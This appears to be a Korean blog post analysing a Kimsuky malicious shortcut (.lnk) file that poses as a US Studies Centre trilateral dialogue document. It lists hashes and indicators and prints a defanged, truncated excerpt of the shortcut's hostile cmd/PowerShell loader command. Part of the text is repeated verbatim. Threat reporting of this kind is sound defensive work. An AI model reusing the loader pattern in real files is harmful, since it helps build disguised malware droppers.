Kimsuky(김수키) 악성코드 주의!USSC 연구센터 사칭 악성코드 발견– 한·호·일 협력 대화 위장 공격(2025.4.16)
Contents
오늘은 오늘도 그렇게 존경하지 않고 우리의 주적인 북한 해킹 조직에서 만든 악성코드인 김수키(Kimsuky) 에서 미국 연구센터(USSC) 사칭 악성코드-USSC AUSTRALIA-KOREA-JAPAN TRACK-1.5 DIALOGUE: FUTURE-ORIENTED COOPERATION에 대해 알아보겠습니다.
미국 연구센터 (USSC)는 시드니 대학교에 있는 싱크탱크이며 미국 외교 정책, 경제 안보, 신기술, 정치, 사회, 문화 분석에 전념하며 이러한 연구들이 호주, 인도-태평양 지역, 그리고 전 세계에 미치는 영향을 연구하고 있으며 USSC는 호주 내 미국에 대한 이해를 높이고 호주와 미국의 관계를 강화하는 것을 목표로 하고 있습니다. 정책 중심 연구 외에도 학부생과 대학원생을 대상으로 교육도 제공
아무튼, 해당 제목은 USSC AUSTRALIA-KOREA-JAPAN TRACK-1.5 DIALOGUE: FUTURE-ORIENTED COOPERATION(USSC 호주-한국-일본 트랙-1.5 대화: 미래지향적 협력)으로 돼 있는 것이 특징입니다.
파일명:USSC AUSTRALIA-KOREA-JAPAN DIALOGUE FUTURE-ORIENTED COOPERATION.lnk
사이즈:1 MB
MD5:89a725b08ab0e8885fc03b543638be96
SHA-1:20443f517f22b292d63e7e06d9713b771d0902da
SHA-256:42f306b905ece8875bdf16d276b8e4c1f70265918625da475e0f0ff0aa90f31c
입니다.
악성코드 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens(=)*" %a in ('dir C:\Windows\Sys(W)ow64\WindowsP(o)werShell\v1.0\*rshell(.)exe /s /b /od') do cal(l) %a "$et=@('.lnk');$d(P)o0 = Get-Loc(a)tion; if($dPo0 -Ma(t)ch 'Sys(t)em32' -or $dP(o)0 -Ma(t)ch 'Prog(r)am Files') {$dPo0 = '%t(e)mp%'};$lnPo0 = Get-Ch(i)ldItem -Path $dPo0 -Re(c)urse *.* -File | where {$_.e(x)tension -in $et} | where(-)object {$_.length -eq …
미국 연구센터 (USSC)는 시드니 대학교에 있는 싱크탱크이며 미국 외교 정책, 경제 안보, 신기술, 정치, 사회, 문화 분석에 전념하며 이러한 연구들이 호주, 인도-태평양 지역, 그리고 전 세계에 미치는 영향을 연구하고 있으며 USSC는 호주 내 미국에 대한 이해를 높이고 호주와 미국의 관계를 강화하는 것을 목표로 하고 있습니다. 정책 중심 연구 외에도 학부생과 대학원생을 대상으로 교육도 제공
아무튼, 해당 제목은 USSC AUSTRALIA-KOREA-JAPAN TRACK-1.5 DIALOGUE: FUTURE-ORIENTED COOPERATION(USSC 호주-한국-일본 트랙-1.5 대화: 미래지향적 협력)으로 돼 있는 것이 특징입니다.
파일명:USSC AUSTRALIA-KOREA-JAPAN DIALOGUE FUTURE-ORIENTED COOPERATION.lnk
사이즈:1 MB
MD5:89a725b08ab0e8885fc03b543638be96
SHA-1:20443f517f22b292d63e7e06d9713b771d0902da
SHA-256:42f306b905ece8875bdf16d276b8e4c1f70265918625da475e0f0ff0aa90f31c
입니다.
악성코드 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens(=)*" %a in ('dir C:\Windows\Sys(W)ow64\WindowsP(o)werShell\v1.0\*rshell(.)exe /s /b /od') do cal(l) %a "$et=@('.lnk');$d(P)o0 = Get-Loc(a)tion; if($dPo0 -Ma(t)ch 'Sys(t)em32' -or $dP(o)0 -Ma(t)ch 'Prog(r)am Files') {$dPo0 = '%t(e)mp%'};$lnPo0 = Get-Ch(i)ldItem -Path $dPo0 -Re(c)urse *.* -File | where {$_.e(x)tension -in $et} | where(-)object {$_.length -eq …
IoC
42f306b905ece8875bdf16d276b8e4c1f70265918625da475e0f0ff0aa90f31c
89a725b08ab0e8885fc03b543638be96
20443f517f22b292d63e7e06d9713b771d0902da
89a725b08ab0e8885fc03b543638be96
20443f517f22b292d63e7e06d9713b771d0902da